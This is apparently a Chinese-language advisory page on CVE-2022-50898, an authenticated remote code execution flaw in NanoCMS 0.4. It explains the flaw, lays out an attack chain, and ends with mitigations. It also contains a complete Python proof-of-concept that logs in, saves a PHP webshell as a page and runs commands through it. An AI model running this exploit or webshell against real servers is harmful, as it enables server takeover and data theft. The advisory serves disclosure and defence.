CVE-2022-50898 NanoCMS 0.4 认证后远程代码执行漏洞

漏洞信息

漏洞编号

CVE-2022-50898

漏洞类型

远程代码执行

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

NanoCMS 0.4

漏洞概述

NanoCMS 0.4是一款轻量级内容管理系统，该版本存在一个严重的认证后文件上传漏洞，CVSS评分高达8.8，属于高危漏洞。攻击者通过利用该CMS的页面创建功能，可以在通过身份验证后上传包含恶意代码的PHP文件到服务器的pages目录。由于系统未对上传的文件内容进行充分的输入验证和安全检查，攻击者可以绕过文件类型限制，将任意PHP代码写入服务器。一旦恶意文件成功上传并被访问，攻击者即可在目标服务器上执行任意系统命令，实现远程代码执行（RCE），从而完全控制受影响的Web服务器。该漏洞的严重性在于它允许已认证的低权限用户获取服务器的最高控制权限，可能导致数据泄露、服务中断乃至整个系统被入侵。由于NanoCMS通常部署在小型企业网站和个人项目中，管理员可能忽视其安全更新，进一步增加了被攻击的风险。

技术细节

漏洞根源在于NanoCMS 0.4的页面创建功能缺乏对用户输入的严格过滤。攻击者首先需要获取CMS的有效用户凭据并登录系统。登录后，攻击者访问页面创建功能（通常位于/admin/或类似的路径），在页面内容字段中插入恶意PHP代码。系统会将用户提交的内容直接写入到pages目录下的.php文件中，未进行任何代码清理或安全校验。攻击者可以利用标准的PHP代码片段（如<?php system($_GET['cmd']); ?>）创建一个webshell。文件保存后，攻击者通过HTTP请求直接访问该PHP文件，并附带命令参数即可在服务器上执行系统命令。整个利用过程无需复杂的绕过技术，标准的文件上传限制（如MIME类型检查）对该攻击无效，因为攻击者并未通过传统文件上传机制，而是利用了页面内容保存功能。该漏洞的利用成功取决于几个因素：攻击者持有有效账号、服务器对pages目录具有写权限、PHP解析功能正常启用。

攻击链分析

STEP 1

步骤1

获取有效凭据：攻击者首先需要获取NanoCMS 0.4系统的有效用户账号和密码，可以利用默认凭据、暴力破解或社会工程学手段

STEP 2

步骤2

认证登录：使用获取的凭据登录NanoCMS管理后台，建立有效的认证会话

STEP 3

步骤3

页面创建：访问页面创建功能，在页面内容字段中注入恶意PHP代码（如webshell代码）

STEP 4

步骤4

文件写入：系统将包含恶意代码的内容保存为.php文件到data/pages/目录，未进行任何安全过滤

STEP 5

步骤5

远程代码执行：通过HTTP请求访问上传的恶意PHP文件，附带命令参数即可在服务器上执行任意系统命令

STEP 6

步骤6

持久化控制：攻击者可进一步植入后门、窃取数据或横向移动到内网其他系统

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2022-50898 NanoCMS 0.4 Authenticated RCE PoC
# Target: NanoCMS 0.4
# Vulnerability: Authenticated file upload leading to RCE

def exploit(target_url, username, password, command):
    """
    Exploit NanoCMS 0.4 authenticated file upload vulnerability
    :param target_url: Base URL of the target NanoCMS installation
    :param username: Valid username for authentication
    :param password: Password for the user
    :param command: System command to execute on the target
    """
    session = requests.Session()
    
    # Step 1: Login to get authenticated session
    login_url = f"{target_url}/index.php"
    login_data = {
        'user': username,
        'pass': password,
        'submit': 'Login'
    }
    
    try:
        response = session.post(login_url, data=login_data, timeout=10)
        
        # Step 2: Create a page with malicious PHP code
        page_url = f"{target_url}/?action=edit_page"
        webshell_content = f"<?php system($_GET['cmd']); ?>"
        page_data = {
            'title': 'pwned',
            'content': webshell_content,
            'submit': 'Save'
        }
        
        response = session.post(page_url, data=page_data, timeout=10)
        
        # Step 3: Extract the created page slug from response
        # In real exploitation, attacker would need to identify the page filename
        # Typically it's stored in pages/ directory
        
        # Step 4: Execute command via webshell
        shell_url = f"{target_url}/data/pages/pwned.php"
        exec_params = {'cmd': command}
        
        response = session.get(shell_url, params=exec_params, timeout=10)
        
        if response.status_code == 200:
            print(f"[+] Command executed successfully!")
            print(f"Output: {response.text}")
        else:
            print(f"[-] Exploitation failed. Status code: {response.status_code}")
            
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")

if __name__ == '__main__':
    if len(sys.argv) < 5:
        print(f"Usage: {sys.argv[0]} <target_url> <username> <password> <command>")
        print(f"Example: {sys.argv[0]} http://target.com admin admin123 'whoami'")
        sys.exit(1)
    
    target = sys.argv[1]
    user = sys.argv[2]
    pwd = sys.argv[3]
    cmd = sys.argv[4]
    
    exploit(target, user, pwd, cmd)

影响范围

NanoCMS 0.4

防御指南

临时缓解措施

立即限制data/pages/目录的访问权限，确保该目录下的PHP文件无法被直接执行；禁用或限制PHP解析功能在该目录中的应用；对所有用户输入实施严格的输入过滤和输出编码；考虑临时关闭页面创建功能直至漏洞修复；部署WAF规则检测包含<?php等PHP代码特征的请求；审计现有用户账号，删除不必要的账号并强制使用强密码。